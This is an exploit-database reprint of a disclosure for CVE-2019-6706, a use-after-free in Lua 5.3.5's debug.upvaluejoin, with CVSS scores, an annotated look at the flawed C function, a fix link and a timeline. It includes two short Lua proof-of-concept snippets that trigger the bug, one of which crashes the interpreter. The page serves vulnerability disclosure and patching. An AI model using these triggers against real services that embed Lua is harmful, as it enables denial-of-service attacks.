Lua 5.3.5 - debug.upvaluejoin Use After Free Exploit

2019-01-2500:00:00

Fady Mohammed Osman

0day.today

129

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.047 Low

EPSS

Percentile

91.8%

JSON

# Exploit Title: Lua 5.3.5
# Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Blog : https://blog.fadyothman.com/
# Date: Jan. 10th 2019
# Vendor Homepage: https://www.lua.org/
# Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz
# Version: 5.3.5
# CVE ID: CVE-2019-6706

During a fuzz session using "AFL", I found a heap use after free in lua
5.3.5, after analysis of the crash I found the root cause of the
vulnerability, here's the details.

The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a
use after free bug when supplied the same function for parameter f1 and f2
and the same upvalue index, additionally I found that the bug is only
triggered when the upvalue is closed, this happens because the
`luaC_upvdeccount` function found in file lgc.c at line 678 will decrement
the refcount and then free the upvalue if the refcount is zero and if the
upvalue is closed.
See the comments below for more explanation.
--------------
LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,
                                            int fidx2, int n2) {
  LClosure *f1;
  UpVal **up1 = getupvalref(L, fidx1, n1, &f1);
  UpVal **up2 = getupvalref(L, fidx2, n2, NULL);
  luaC_upvdeccount(L, *up1);      //Will delete up1
  *up1 = *up2;     //up1 is up2 because it's the same upvalue and now it's
freed.
  (*up1)->refcount++;   //up1 is freed, yet it's used here.
  if (upisopen(*up1)) (*up1)->u.open.touched = 1;
  luaC_upvalbarrier(L, *up1);
}
--------------

- To trigger the bug simply use a lua program like this (this one will
crash):
--
f=load(function() end)
interesting={}
interesting[0]=string.rep("A",512)
debug.upvaluejoin(f,1,f,1)
---

- Another program that will not crash (unless you compile with
-fsanitize=address):
---
function w()
local x = {}
f = function() print(x) end
end
w()
debug.upvaluejoin(f,2,f,2)
---

If you want a fix you can use the patch provided here:
http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html


Timeline:
- Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.
- Jan 23rd 2019 : CVE Identifier obtained.
- Jan 25th 2019 : Fix is suggested by Matěj Cepl.

Refrences:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706
https://security-tracker.debian.org/tracker/CVE-2019-6706
https://vuldb.com/?id.130228